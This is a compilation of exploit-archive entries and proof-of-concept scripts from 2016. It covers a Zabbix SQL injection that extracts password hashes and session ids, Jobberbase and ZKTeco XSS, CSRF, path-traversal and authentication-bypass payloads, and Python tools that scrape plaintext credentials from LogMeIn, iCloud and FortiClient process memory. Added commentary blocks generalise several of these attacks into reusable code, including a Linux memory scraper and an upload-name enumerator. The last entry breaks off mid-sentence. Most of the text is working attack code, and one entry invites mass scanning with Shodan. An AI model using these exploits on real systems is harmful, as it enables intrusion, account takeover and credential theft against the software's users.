
# Exploit Title: 2.0 < Zabbix < 3.0.4 SQL Injection Python PoC
# Date: 20-08-2016
# Software Link: www.zabbix.com
# Exploit Author: Unknown(http://seclists.org/fulldisclosure/2016/Aug/82)
# Version: Zabbix 2.0-3.0.x(<3.0.4)

# PoC Author: Zzzians
# Contact: Zzzians@gmail.com
# Test on: Linux (Debian/CentOS/Ubuntu)

# -*- coding: utf_8 -*-
# Use Shodan, or comb the intranet for Zabbix front-ends, and enjoy :)
import sys,os,re,urllib2
def Inject(url,sql,reg):
    payload = url + "jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=" + urllib2.quote(
        sql) + "&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids[23297]=23297&action=showlatest&filter=&filter_task=&mark_color=1"
    try:
        response = urllib2.urlopen(payload, timeout=20).read()
    except Exception, msg:
        print '\t\tOpps,an error occurs...',msg
    else:
        result_reg = re.compile(reg)
        results = result_reg.findall(response)
        #print payload  # uncomment this to see the full request URL
        if results:
            return results[0]
def exploit(url,userid):
    passwd_sql = "(select 1 from (select count(*),concat((select(select concat(cast(concat(alias,0x7e,passwd,0x7e) as char),0x7e)) from zabbix.users LIMIT "+str(userid-1)+",1),floor(rand(0)*2))x from information_schema.tables group by x)a)"
    session_sql="(select 1 from (select count(*),concat((select(select concat(cast(concat(sessionid,0x7e,userid,0x7e,status) as char),0x7e)) from zabbix.sessions where status=0 and userid="+str(userid)+" LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)"
    password = Inject(url,passwd_sql,r"Duplicate\s*entry\s*'(.+?)~~")
    if(password):
        print '[+]Username~Password : %s' % password
    else:
        print '[-]Get Password Failed'
    session_id = Inject(url,session_sql,r"Duplicate\s*entry\s*'(.+?)~")
    if(session_id):
        print "[+]Session_id:%s" % session_id
    else:
        print "[-]Get Session id Failed"
    print '\n'
        
def main():
    print '=' * 70
    print '\t    2.0.x?  <  Zabbix  <  3.0.4 SQL Inject Python Exploit Poc'
    print '\t\t    Author:Zzzians(Zzzians@gmail.com)'
    print '\t    Reference:http://seclists.org/fulldisclosure/2016/Aug/82'
    print '\t\t\t    Time:2016-08-20\n'
    urls = ["http://10.15.5.86"]
    ids = [1,2]
    for url in urls:
        if url[-1] != '/': url += '/'
        print '='*25 +  url + '='*25
        for userid in ids:
            exploit(url,userid)
main()
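The PoC above leaks one row per request through MySQL's duplicate-key error. The following is an added example, not part of the original PoC: it rebuilds the PoC's request and its count(*)/floor(rand(0)*2) wrapper as functions, and parses the "Duplicate entry" message back into fields. The fixed parameter values come from the PoC's URL; the host name, the response text and the leaked row used offline are constructed here.

```python
"""Error-based (double-query) extraction as used by the Zabbix PoC above.

Added example, not part of the original PoC. Runs offline against a constructed
response so the parsing can be checked without a target.
"""
import hashlib
import re
from urllib.parse import quote, urljoin

# Everything around profileIdx2 is taken verbatim from the PoC's request.
JSRPC_PARAMS = (
    "jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083"
    "&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph"
    "&profileIdx2={sql}&updateProfile=true&screenitemid=&period=3600&stime=20160817050632"
    "&resourcetype=17&itemids[23297]=23297&action=showlatest&filter=&filter_task=&mark_color=1"
)

# MySQL echoes the colliding GROUP BY key: "Duplicate entry '<key>' for key 'group_key'".
DUPLICATE_RE = re.compile(r"Duplicate entry '(?P<key>.*?)' for key", re.S)

# Constructed stand-in for a leaked users.passwd value: Zabbix 3.0 stores an
# unsalted MD5, and md5("zabbix") is the default Admin password hash.
CONSTRUCTED_HASH = hashlib.md5(b"zabbix").hexdigest()


def double_query(inner_select: str) -> str:
    """Wrap a single-row SELECT in the count(*)/floor(rand(0)*2) GROUP BY trick.

    rand(0) is seeded, so the computed key repeats within the first rows of
    information_schema.tables and MySQL aborts with a duplicate-key error that
    carries the SELECT's result in its message.
    """
    return ("(select 1 from (select count(*),concat((" + inner_select + "),0x7e,"
            "floor(rand(0)*2))x from information_schema.tables group by x)a)")


def user_row_query(row: int) -> str:
    """'alias~passwd' for the row-th entry of zabbix.users (1-based)."""
    return "select concat(alias,0x7e,passwd) from zabbix.users limit %d,1" % (row - 1)


def session_query(userid: int) -> str:
    """'sessionid~userid~status' for one active (status=0) session of userid."""
    return ("select concat(sessionid,0x7e,userid,0x7e,status) from zabbix.sessions "
            "where status=0 and userid=%d limit 0,1" % userid)


def build_url(base_url: str, inner_select: str) -> str:
    """Complete request URL with the wrapped query URL-encoded into profileIdx2."""
    return urljoin(base_url, JSRPC_PARAMS.format(sql=quote(double_query(inner_select), safe="")))


def parse_leak(response_text: str):
    """Fields leaked through the error as a list, or None if no error was shown."""
    m = DUPLICATE_RE.search(response_text)
    if not m:
        return None
    data, _sep, _rand = m.group("key").rpartition("~")  # drop the trailing 0/1 from rand()
    return data.split("~")


def constructed_response() -> str:
    """What a vulnerable jsrpc.php shows for user_row_query(1) (constructed text)."""
    return ("<br><b>Error in query [SELECT ...]</b> "
            "[Duplicate entry 'Admin~%s~1' for key 'group_key']" % CONSTRUCTED_HASH)


if __name__ == "__main__":
    print(build_url("http://zabbix.example/", user_row_query(1)))   # host is constructed
    print(parse_leak(constructed_response()))
```

The sessionid leaked by session_query() is a live zbx_sessionid cookie value, which is why the PoC pulls it alongside the password hash. On the defensive side, the request is easy to spot in web-server logs: a profileIdx2 value containing "select", "rand(0)" or "information_schema" is never produced by the Zabbix front-end itself.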
            
Jobberbase:			http://www.jobberbase.com/
Version:			2.0
By Ross Marks: 		http://www.rossmarks.co.uk

1) Local path disclosure - change any variable to an array and in most cases it will tell you the local path where the application is installed
	eg. http://example.com/api/api.php?action=getJobs&type[]=0&category=0&count=5&random=1&days_behind=7&response=js
	returns: Array to string conversion in <b>/var/www/jobberbase/_lib/class.Job.php</b>

2) Open redirect - when submitting an application you can change the "Referer:" header to anything and the application will redirect there

3) reflected XSS in username - http://example.com/admin/
		eg. "><script>alert(1)</script>
	reflected XSS in search: http://example.com/search/|<img src="x" onError="alert(1)">/

4) persistent XSS on admin backend homepage
		create a job and give the URL:
		" onmouseover="alert(1)
	persistent XSS - admin add to category name (no protection)

5) unrestricted file upload
	the CV upload accepts any filetype and appends _ uniqid() to the filename
	eg. "file.php" becomes "file_<uniqid>.php"
	uniqid() is an insecure method for generating random sequences and is based on microtime
	if the server is using an older version of PHP a null byte can be used
	ie. "test.php%00.php" would be uploaded as "test.php"

6) code execution race condition:
	if the admin has chosen not to store uploaded CVs
	they are first moved from /tmp to the writable /upload directory before being unlinked
	this gives a brief window of opportunity for an attacker to run http://example.com/uploads/file.php before it is deleted

7) SQL injection in http://example.com/api/api.php?action=getJobs&type=0&category=0&count=5&random=1&days_behind=7&response=js
	days_behind parameter is vulnerable

** notes **

the admin change password page doesn't need the old password and has no CSRF token, just a simple POST request
admin password stored as unsalted md5
cookies do NOT have the "secure" or "HttpOnly" flags enabled
no CSRF protection anywhere
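Item 5 says uniqid() is predictable because it is built from microtime, which is what makes the renamed "file_<uniqid>.php" reachable. The following added example (not Jobberbase code) shows why: PHP's uniqid() without the more_entropy flag is just the current time formatted as "%08x%05x" (seconds, microseconds), so the whole name space for a given upload second can be enumerated. The timestamps and file stem used below are constructed.

```python
"""PHP uniqid() reproduced and inverted, to enumerate upload names.

Added example, not part of the Jobberbase advisory. uniqid('', false) in PHP is
sprintf("%08x%05x", sec, usec) from gettimeofday(), i.e. 13 hex characters with
no randomness at all.
"""
import re

UNIQID_RE = re.compile(r"^[0-9a-f]{13}$")


def php_uniqid(sec: int, usec: int) -> str:
    """Reproduce PHP's uniqid('', false) for a given (seconds, microseconds)."""
    if not (0 <= usec < 1_000_000):
        raise ValueError("usec out of range")
    return "%08x%05x" % (sec, usec)


def parse_uniqid(uid: str):
    """Inverse: recover (sec, usec) from a plain 13-character uniqid."""
    if not UNIQID_RE.match(uid):
        raise ValueError("not a plain uniqid")
    return int(uid[:8], 16), int(uid[8:], 16)


def candidate_names(stem: str, ext: str, sec_from: int, sec_to: int, usec_step: int = 1):
    """Yield every "<stem>_<uniqid><ext>" the upload could have produced between
    two wall-clock seconds (inclusive). usec_step > 1 trades completeness for a
    shorter list once the server's clock granularity is known."""
    for sec in range(sec_from, sec_to + 1):
        for usec in range(0, 1_000_000, usec_step):
            yield "%s_%s%s" % (stem, php_uniqid(sec, usec), ext)


def candidate_count(sec_from: int, sec_to: int, usec_step: int = 1) -> int:
    """Size of the search space candidate_names() will enumerate."""
    return (sec_to - sec_from + 1) * ((1_000_000 + usec_step - 1) // usec_step)


if __name__ == "__main__":
    # Constructed upload time; in practice the HTTP Date header of the upload
    # response gives the server's second, which fixes the first 8 characters.
    upload_sec = 1473000000
    print("prefix for that second:", php_uniqid(upload_sec, 0)[:8])
    print("candidates for a 2 s window:", candidate_count(upload_sec, upload_sec + 1))
    for name in list(candidate_names("cv", ".php", upload_sec, upload_sec))[:3]:
        print(name)
```

Because the seconds part is fully known from the response's Date header, the attacker only has to search the microsecond part, which is why the advisory calls uniqid() insecure for naming uploaded files. A random name from random_bytes(), or storing uploads outside the web root, closes both item 5 and the race in item 6.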
            
#####
# LogMeIn Client v1.3.2462 (64bit) Local Credentials Disclosure
# Tested on Windows Windows Server 2012 R2 64bit, English
# Vendor Homepage @ https://secure.logmein.com/home/en
# Date 06/09/2016
# Bug Discovery by:
#
# Alexander Korznikov (https://www.linkedin.com/in/nopernik)
# http://korznikov.com/
#
# Viktor Minin (https://www.linkedin.com/in/MininViktor)
# https://1-33-7.com/
#
# Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
# http://www.black-rose.ml
#
#####
# LogMeIn Client v1.3.2462 is vulnerable to local credentials disclosure: the supplied username and password are stored in plaintext in the process memory.
# A potential attacker could reveal the supplied username and password in order to gain access to the account and its associated computers.
#####
# Proof-Of-Concept Code:

import time
import urllib
from winappdbg import Debug, Process

username	= ''
password	= ''
found		= 0
filename 	= "LMIIgnition.exe"
process_pid = 0
memory_dump	= []

debug = Debug()
try:
	print "[~] Searching for pid by process name '%s'.." % (filename)
	time.sleep(1)
	debug.system.scan_processes()
	for (process, process_name) in debug.system.find_processes_by_filename(filename):
		process_pid = process.get_pid()
	if process_pid != 0:
		print "[+] Found process with pid #%d" % (process_pid)
		time.sleep(1)
		print "[~] Trying to read memory for pid #%d" % (process_pid)
		
		process = Process(process_pid)
		for address in process.search_bytes('\x26\x5F\x5F\x56\x49\x45\x57\x53\x54\x41\x54\x45\x3D'):
			memory_dump.append(process.read(address,150))
		for dump in memory_dump:
			try:
				email_addr	= dump.split('email=')[1]
				tmp_passwd	= dump.split('password=')[1]
			except IndexError:
				continue  # this copy of the form has no email/password fields after the marker
			username	= email_addr.split('&hiddenEmail=')[0]
			password	= tmp_passwd.split('&rememberMe=')[0]
			if username != '' and password !='':
				found = 1
				print "[+] Credentials found!\r\n----------------------------------------"
				print "[+] Username: %s" % urllib.unquote_plus(username)
				print "[+] Password: %s" % password
				break
		if found == 0:
			print "[-] Credentials not found! Make sure the client is connected."
	else:
		print "[-] No process found with name '%s'." % (filename)
	
	debug.loop()
finally:
    debug.stop()
            
#####
# Apple iCloud Desktop Client v5.2.1.0 Local Credentials Disclosure After Sign Out Exploit
# Tested on Windows Windows 7 64bit, English
# Vendor Homepage 	@ https://www.apple.com/
# Product Homepage 	@ https://support.apple.com/en-us/HT204283
# Date 07/09/2016
# Bug Discovery by:
#
# Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
# http://www.black-rose.ml
#
# Viktor Minin (https://www.linkedin.com/in/MininViktor)
# https://1-33-7.com/
#
# Alexander Korznikov (https://www.linkedin.com/in/nopernik)
# http://korznikov.com/
#
#####
# Apple iCloud Desktop Client v5.2.1.0 is vulnerable to local credentials disclosure after the user has signed out.
# It seems that iCloud does not keep the supplied credentials while the user is logged in, but after sign out the supplied username and password are stored in plaintext in the process memory.
# Funny eh?!
# A potential attacker could reveal the supplied username and password in order to gain access to the iCloud account.
#
# The authors are not responsible for any misuse or damage caused by use of this script code.
# Please use responsibly.
#####
# Proof-Of-Concept Code:

import time
import urllib
from winappdbg import Debug, Process

def b2h(data):
	# bytes -> "41 42 43" style hex string
	return ''.join(["%02X " % ord(x) for x in data]).strip()

def h2b(hexstr):
	# "41 42 43" style hex string -> bytes
	bytes = []
	hexstr = ''.join(hexstr.split(" "))
	for i in range(0, len(hexstr), 2):
		bytes.append(chr(int(hexstr[i:i+2], 16)))
	return ''.join(bytes)

usr			= ''
pwd			= ''
found		= 0
filename 	= "iCloud.exe"
process_pid = 0
memory_dump	= []

debug = Debug()
try:
	print "#########################################################################"
	print "#\tApple iCloud v5.2.1.0 Local Credentials Disclosure Exploit\t#"
	print "#   Bug Discovery by Yakir Wizman, Victor Minin, Alexander Korznikov\t#"
	print "#\t\tTested on Windows Windows 7 64bit, English\t\t#"
	print "#\t\t\tPlease use responsibly.\t\t\t\t#"
	print "#########################################################################\r\n"
	print "[~] Searching for pid by process name '%s'.." % (filename)
	time.sleep(1)
	debug.system.scan_processes()
	for (process, process_name) in debug.system.find_processes_by_filename(filename):
		process_pid = process.get_pid()
	if process_pid != 0:
		print "[+] Found process with pid #%d" % (process_pid)
		time.sleep(1)
		print "[~] Trying to read memory for pid #%d" % (process_pid)
		
		process = Process(process_pid)
		for address in process.search_bytes('\x88\x38\xB7\xAE\x73\x8C\x07\x00\x0A\x16'):
			memory_dump.append(process.read(address,50))
		
		try:
			# hex dump of the bytes after the username marker, cut at the first NUL
			hexdump = b2h(memory_dump[0]).split('88 38 B7 AE 73 8C 07 00 0A 16')[1]
			usr = h2b(hexdump.split(' 00')[0])
		except IndexError:
			pass  # marker not found, or nothing after it
			
		memory_dump	= []
		for address in process.search_bytes('\x65\x00\x88\x38\xB7\xAE\x73\x8C\x07\x00\x02\x09'):
			memory_dump.append(process.read(address,60))
		try:
			# same for the password marker
			hexdump = b2h(memory_dump[0]).split('07 00 02 09')[1]
			pwd = h2b(hexdump.split(' 00')[0])
		except IndexError:
			pass
		
		if usr != '' and pwd !='':
			found = 1
			print "[+] iCloud Credentials found!\r\n----------------------------------------"
			print "[+] Username: %s" % usr
			print "[+] Password: %s" % pwd
		if found == 0:
			print "[-] Credentials not found!"
	else:
		print "[-] No process found with name '%s'." % (filename)
	
	debug.loop()
finally:
    debug.stop()
            
'''
Title        : Extracting clear text passwords from running processes (FortiClient)
CVE-ID       : none
Product      : FortiClient SSLVPN
Service      : FortiTray.exe
Affected     : <=5.4
Impact       : Critical
Remote       : No
Website link : http://forticlient.com/
Reported     : 31/08/2016
Authors      : Viktor Minin            https://1-33-7.com
               Alexander Korznikov     http://korznikov.com
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
In our research which involved this program we found that this process stores the credentials you supplied for connecting in clear text in the process memory.
In this situation a potential attacker who has hacked your system can reveal your username and password, steal them and use them.
This may assist him in gaining persistent access to your organization's LAN.
'''

from winappdbg import Debug, Process

filename = "FortiTray.exe"      # process name
search_string = "fortissl"      # pattern marking the offset where the credentials are stored

# Searching function
def memory_search(pid, strings):
    process = Process(pid)
    mem_dump = []
    # You could also use process.search_regexp to use regular expressions,
    # or process.search_text for Unicode strings,
    # or process.search_hexa for raw bytes represented in hex.
    for address in process.search_bytes(strings):
        dump = process.read(address - 10, 800)      # dump 800 bytes, starting 10 bytes before the match
        mem_dump.append(dump)
    for i in mem_dump:
        if "FortiClient SSLVPN offline" in i:        # print every matching dump; fields are at fixed offsets
            print "\n"
            print " [+] Address and port to connect: " + str(i[136:180])
            print " [+] UserName: " + str(i[677:685])
            print " [+] Password: " + str(i[705:715])
            print "\n"

debug = Debug()
try:
    # Lookup the currently running processes.
    debug.system.scan_processes()
    # Look for all processes that match the requested filename...
    for (process, name) in debug.system.find_processes_by_filename(filename):
        pid = process.get_pid()
        memory_search(pid, search_string)
finally:
    debug.stop()
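The three scripts above (LogMeIn, iCloud, FortiClient) share one technique: find a marker in a process's memory, read a window after it, and cut the credentials out of that window. The following is an added example, not the authors' code, that generalises it. The Windows PoCs depend on winappdbg's Process.search_bytes(); this version does the same search over a list of (base address, bytes) regions so the extraction can be checked offline, and adds a Linux backend that fills that list from /proc/<pid>/maps and /proc/<pid>/mem. The marker and field names are those the LogMeIn PoC looks for; the memory image used offline is constructed here and is not a real dump.

```python
"""Scanning process memory for credentials, generalised from the PoCs above.

Added example, not the authors' code. The Linux backend is only exercised when
a PID is given on the command line; the offline run uses a constructed image.
"""
import re
import sys
from typing import Dict, Iterator, List, Optional, Tuple
from urllib.parse import unquote_plus

Region = Tuple[int, bytes]           # (base virtual address, contents)
WINDOW = 150                         # bytes read after each hit, as in the LogMeIn PoC
VIEWSTATE_MARKER = b"&__VIEWSTATE="  # the PoC anchors on this ASP.NET form field
MAX_REGION = 64 << 20                # skip absurdly large mappings when reading /proc

# The login form is URL-encoded, so each field ends at the next "&"; a NUL
# guards against running into unrelated memory.
FIELD_PATTERNS = {
    "username": re.compile(rb"(?:^|&)email=([^&\x00]*)&hiddenEmail="),
    "password": re.compile(rb"(?:^|&)password=([^&\x00]*)&rememberMe="),
}


def search_regions(regions: List[Region], pattern: bytes, window: int = WINDOW) -> Iterator[Tuple[int, bytes]]:
    """Yield (address, bytes_after_hit) for every occurrence of pattern.

    Equivalent to Process.search_bytes() followed by Process.read(addr, window).
    A hit straddling two regions is missed, the same limitation the PoCs have.
    """
    for base, data in regions:
        idx = data.find(pattern)
        while idx >= 0:
            yield base + idx, data[idx:idx + window]
            idx = data.find(pattern, idx + 1)


def extract_form_credentials(chunk: bytes) -> Optional[Dict[str, str]]:
    """Pull username/password out of one chunk; None unless both are present."""
    found = {}
    for name, rx in FIELD_PATTERNS.items():
        m = rx.search(chunk)
        if m:
            # the PoC only unquotes the username; the password is form-encoded too
            found[name] = unquote_plus(m.group(1).decode("latin-1"))
    return found if len(found) == len(FIELD_PATTERNS) else None


def scrape(regions: List[Region]) -> List[Dict[str, str]]:
    """Unique credential pairs found after every VIEWSTATE marker, in address order."""
    results: List[Dict[str, str]] = []
    for _addr, chunk in search_regions(regions, VIEWSTATE_MARKER):
        creds = extract_form_credentials(chunk)
        if creds and creds not in results:
            results.append(creds)
    return results


def linux_regions(pid: int) -> Iterator[Region]:
    """Readable mappings of a live Linux process via /proc/<pid>/{maps,mem}.

    Reading another process's memory needs ptrace rights on it (same user and
    a permissive kernel.yama.ptrace_scope, or CAP_SYS_PTRACE).
    """
    with open(f"/proc/{pid}/maps") as maps, open(f"/proc/{pid}/mem", "rb", 0) as mem:
        for line in maps:
            span, perms = line.split()[:2]
            start, end = (int(x, 16) for x in span.split("-"))
            if "r" not in perms or end - start > MAX_REGION:
                continue
            try:
                mem.seek(start)
                yield start, mem.read(end - start)
            except (OSError, OverflowError):
                continue  # [vvar], [vsyscall] and guard pages are not readable this way


def constructed_image() -> List[Region]:
    """Offline stand-in for a process image (constructed, not a real dump)."""
    form = (b"__EVENTTARGET=&__VIEWSTATE=dDwxMjM0NTY3ODk7Oz4%3D"
            b"&email=alice%40example.com&hiddenEmail=alice%40example.com"
            b"&password=correct+horse&rememberMe=on&lang=en\x00")
    return [
        (0x00010000, b"nothing interesting in this mapping\x00" * 4),
        (0x7FF000000000, b"\x00" * 64 + form + b"\x00" * 64),
    ]


if __name__ == "__main__":
    regions = list(linux_regions(int(sys.argv[1]))) if len(sys.argv) > 1 else constructed_image()
    for creds in scrape(regions):
        print("[+] %(username)s : %(password)s" % creds)
```

The FortiClient script instead slices fixed offsets (i[677:685], i[705:715]) out of its window, which breaks as soon as a username is a different length; anchoring each field on the delimiters that surround it, as above, is the more robust way to write such an extractor.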
            
<?php
#############################################################################
## PHP 7.0 JsonSerializable::jsonSerialize json_encode Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 7.0
## Date: 31/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
class jsonTmp implements JsonSerializable {
	function jsonSerialize() {
		$jsonTmp = new jsonTmp();
		return $jsonTmp;
	}
}
json_encode(new jsonTmp());
?>
            
<!--

ZKTeco ZKAccess Security System 5.3.1 Stored XSS Vulnerability


Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
Product web page: http://www.zkteco.com
Affected version: 5.3.12252

Summary: ZKAccess Systems are built on flexible, open technology to provide
management, real-time monitoring, and control of your access control system-all
from a browser, with no additional software to install. Our secure Web-hosted
infrastructure and centralized online administration reduce your IT costs and
allow you to easily manage all of your access points in a single location. C3-100's
versatile design features take care of present and future needs with ease and
efficiency. It is one of the most rugged and reliable controllers on the market,
with a multitude of built-in features. The C3-100 can communicate at 38.4 Kbps
via RS-485 configuration or Ethernet TCP/IP networks. It can store up to 30,000
cardholders.

Desc: Input passed to the 'holiday_name' and 'memo' POST parameters is not properly
sanitised before being returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in context of an affected
site.

Tested on: CherryPy/3.1.0beta3 WSGI Server
           Firmware: AC Ver 4.1.9 3893-07 Jan 6 2016
           Python 2.6


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5368
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5368.php


18.07.2016

-->


<html>
  <body>
    <form action="http://127.0.0.1/data/iaccess/AccHolidays/_new_/?_lock=1" method="POST">
      <input type="hidden" name="pk" value="None" />
      <input type="hidden" name="holiday&#95;name" value=""><script>alert&#40;1&#41;<&#47;script>" />
      <input type="hidden" name="holiday&#95;type" value="1" />
      <input type="hidden" name="start&#95;date" value="09&#47;13&#47;2016" />
      <input type="hidden" name="end&#95;date" value="10&#47;18&#47;2016" />
      <input type="hidden" name="loop&#95;by&#95;year" value="2" />
      <input type="hidden" name="memo" value=""><script>alert&#40;2&#41;<&#47;script>" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
            

ZKTeco ZKBioSecurity 3.0 File Path Manipulation Vulnerability


Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
Product web page: http://www.zkteco.com
Affected version: 3.0.1.0_R_230
                  Platform: 3.0.1.0_R_230
                  Personnel: 1.0.1.0_R_1916
                  Access: 6.0.1.0_R_1757
                  Elevator: 2.0.1.0_R_777
                  Visitor: 2.0.1.0_R_877
                  Video:2.0.1.0_R_489
                  Adms: 1.0.1.0_R_197

Summary: ZKBioSecurity3.0 is the ultimate "All in One" web based security
platform developed by ZKTeco. It contains four integrated modules: access
control, video linkage, elevator control and visitor management. With an
optimized system architecture designed for high level biometric identification
and a modern-user friendly UI, ZKBioSecurity 3.0 provides the most advanced
solution for a whole new user experience.

Desc: File path manipulation vulnerabilities arise when user-controllable data
is placed into a file or URL path that is used on the server to access
local resources, which may be within or outside the web root. An attacker can
modify the file path to access different resources, which may contain sensitive
information. Even where an attack is constrained within the web root, it is often
possible to retrieve items that are normally protected from direct access, such
as application configuration files, the source code for server-executable scripts,
or files with extensions that the web server is not configured to serve directly.



Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Microsoft Windows 7 Professional SP1 (EN)
           Apache-Coyote/1.1
           Apache Tomcat/7.0.56


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5365
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5365.php


18.07.2016

--


http://127.0.0.1:8088/baseAction!getPageXML.action?xmlPath=/vid/../WEB-INF/web.xml
            
<!--

ZKTeco ZKBioSecurity 3.0 CSRF Add Superadmin Exploit


Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
Product web page: http://www.zkteco.com
Affected version: 3.0.1.0_R_230
                  Platform: 3.0.1.0_R_230
                  Personnel: 1.0.1.0_R_1916
                  Access: 6.0.1.0_R_1757
                  Elevator: 2.0.1.0_R_777
                  Visitor: 2.0.1.0_R_877
                  Video:2.0.1.0_R_489
                  Adms: 1.0.1.0_R_197

Summary: ZKBioSecurity3.0 is the ultimate "All in One" web based security
platform developed by ZKTeco. It contains four integrated modules: access
control, video linkage, elevator control and visitor management. With an
optimized system architecture designed for high level biometric identification
and a modern-user friendly UI, ZKBioSecurity 3.0 provides the most advanced
solution for a whole new user experience.

Desc: The application interface allows users to perform certain actions via
HTTP requests without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative privileges
if a logged-in user visits a malicious web site.



Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Microsoft Windows 7 Professional SP1 (EN)
           Apache-Coyote/1.1
           Apache Tomcat/7.0.56


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5364
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5364.php


18.07.2016

-->


<html>
  <body>
    <form action="http://127.0.0.1:8088/authUserAction!edit.action" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="authUser&#46;username" value="thricer" />
      <input type="hidden" name="authUser&#46;loginPwd" value="111111" />
      <input type="hidden" name="repassword" value="111111" />
      <input type="hidden" name="authUser&#46;isActive" value="true" />
      <input type="hidden" name="authUser&#46;isSuperuser" value="true" />
      <input type="hidden" name="groupIds" value="1" />
      <input type="hidden" name="deptIds" value="1" />
      <input type="hidden" name="areaIds" value="1" />
      <input type="hidden" name="authUser&#46;email" value="lab@zeroscience.mk" />
      <input type="hidden" name="authUser&#46;name" value="test" />
      <input type="hidden" name="authUser&#46;lastName" value="lasttest" />
      <input type="hidden" name="fingerTemplate" value="&#13;" />
      <input type="hidden" name="fingerId" value="&#13;" />
      <input type="hidden" name="logMethod" value="add" />
      <input type="hidden" name="un" value="1471451964349_2769" />
      <input type="hidden" name="systemCode" value="base" />
      <input type="submit" value="Go" />
    </form>
  </body>
</html>
            
ZKTeco ZKBioSecurity 3.0 (visLogin.jsp) Local Authorization Bypass


Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
Product web page: http://www.zkteco.com
Affected version: 3.0.1.0_R_230
                  Platform: 3.0.1.0_R_230
                  Personnel: 1.0.1.0_R_1916
                  Access: 6.0.1.0_R_1757
                  Elevator: 2.0.1.0_R_777
                  Visitor: 2.0.1.0_R_877
                  Video:2.0.1.0_R_489
                  Adms: 1.0.1.0_R_197

Summary: ZKBioSecurity3.0 is the ultimate "All in One" web based security
platform developed by ZKTeco. It contains four integrated modules: access
control, video linkage, elevator control and visitor management. With an
optimized system architecture designed for high level biometric identification
and a modern-user friendly UI, ZKBioSecurity 3.0 provides the most advanced
solution for a whole new user experience.

Desc: The issue exists due to the way the visLogin.jsp script processes the login
request via the 'EnvironmentUtil.getClientIp(request)' method. It checks whether
the request comes from the local machine and sets the ip variable to '127.0.0.1'
if it equals 0:0:0:0:0:0:0:1. The ip variable is then used as the username,
together with the hard-coded password '123456', to authenticate automatically,
which can be abused to disclose sensitive information and/or perform unauthorized
actions.

Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Microsoft Windows 7 Professional SP1 (EN)
           Apache-Coyote/1.1
           Apache Tomcat/7.0.56


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5367
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5367.php


18.07.2016

--


C:\Program Files (x86)\BioSecurity\MainResource\tomcat\webapps\ROOT\visLogin.jsp:
---------------------------------------------------------------------------------

<%@ page language="java" import="java.util.*" pageEncoding="UTF-8"%>
<%@page import="com.zk.common.util.EnvironmentUtil"%>
<%
String path = request.getContextPath();
String basePath = request.getScheme()+"://"+request.getServerName()+":"+request.getServerPort()+path+"/";

String ip= EnvironmentUtil.getClientIp(request);
if("0:0:0:0:0:0:0:1".equals(ip))
{
    ip = "127.0.0.1";
}

%>
<jsp:include  page="login.jsp"/>
  <script type="text/javascript" src="/vis/js/jquery.cookie.js"></script>

  <script>
      function autoLogin()
      {
                $.cookie('backUrl', "visRegistrationAction!registrationTouch.action?type=touch", { expires: 1 });
                $.cookie('customerBackUrl', "visRegistrationAction!registrationTouch.action?type=touch", { expires: 1 });
        var ip = "<%=ip%>";
        $("#userLoginForm input[name='username']").val(ip);
        $("#userLoginForm input[name='password']").val("123456");
        $('#userLoginForm').submit();
      }
      window.onload=autoLogin;
</script>

---------------------------------------------------------------------------------
            
ZKTeco ZKBioSecurity 3.0 Hardcoded Credentials Remote SYSTEM Code Execution


Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
Product web page: http://www.zkteco.com
Affected version: 3.0.1.0_R_230
                  Platform: 3.0.1.0_R_230
                  Personnel: 1.0.1.0_R_1916
                  Access: 6.0.1.0_R_1757
                  Elevator: 2.0.1.0_R_777
                  Visitor: 2.0.1.0_R_877
                  Video:2.0.1.0_R_489
                  Adms: 1.0.1.0_R_197

Summary: ZKBioSecurity3.0 is the ultimate "All in One" web based security
platform developed by ZKTeco. It contains four integrated modules: access
control, video linkage, elevator control and visitor management. With an
optimized system architecture designed for high level biometric identification
and a modern-user friendly UI, ZKBioSecurity 3.0 provides the most advanced
solution for a whole new user experience.

Desc: The ZKBioSecurity solution suffers from use of hard-coded credentials.
The application comes bundled with a pre-configured Apache Tomcat server and an
exposed 'manager' application. After authenticating with the credentials
username: zkteco, password: zkt123, stored in the tomcat-users.xml file, an
